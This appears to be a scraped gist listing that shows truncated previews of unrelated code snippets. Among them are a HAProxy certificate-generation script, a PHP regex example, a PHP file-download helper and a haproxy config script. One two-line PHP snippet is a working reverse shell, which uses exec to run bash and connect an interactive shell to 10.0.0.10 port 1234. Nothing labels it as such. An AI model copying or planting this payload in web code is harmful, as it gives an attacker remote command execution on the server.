This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# usage: ./genhaproxypem.sh domain.com | |
# Generate a unique private key (KEY) | |
sudo openssl genrsa -out $1.key 2048 | |
# Generating a Certificate Signing Request (CSR) | |
sudo openssl req -new -key $1.key -out $1.csr | |
# Creating a Self-Signed Certificate (CRT) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$str = 'In My Cart : 11 12 items'; | |
preg_match_all('!\d+!', $str, $matches); | |
print_r($matches); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Download a large distant file to a local destination. | |
* | |
* This method is very memory efficient :-) | |
* The file can be huge, PHP doesn't load it in memory. | |
* | |
* /!\ Warning, the return value is always true, you must use === to test the response type too. | |
* | |
* @author dalexandre |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#Requirements: nothing | |
#This script renames haproxy individual site configuration files to disable them for h2gencfg to be aware of them | |
#Script assumes templates on: /etc/haproxy/templates | |
#config files on /etc/haproxy/conf.d/ | |
#├── 20-http-domain.tld.cfg | |
#├── 40-https-domain.tld.cfg | |
#└── 50-backends-domain.tld.cfg | |
TIMEDATE=$(date +"%Y%m%d-%H%M%S") |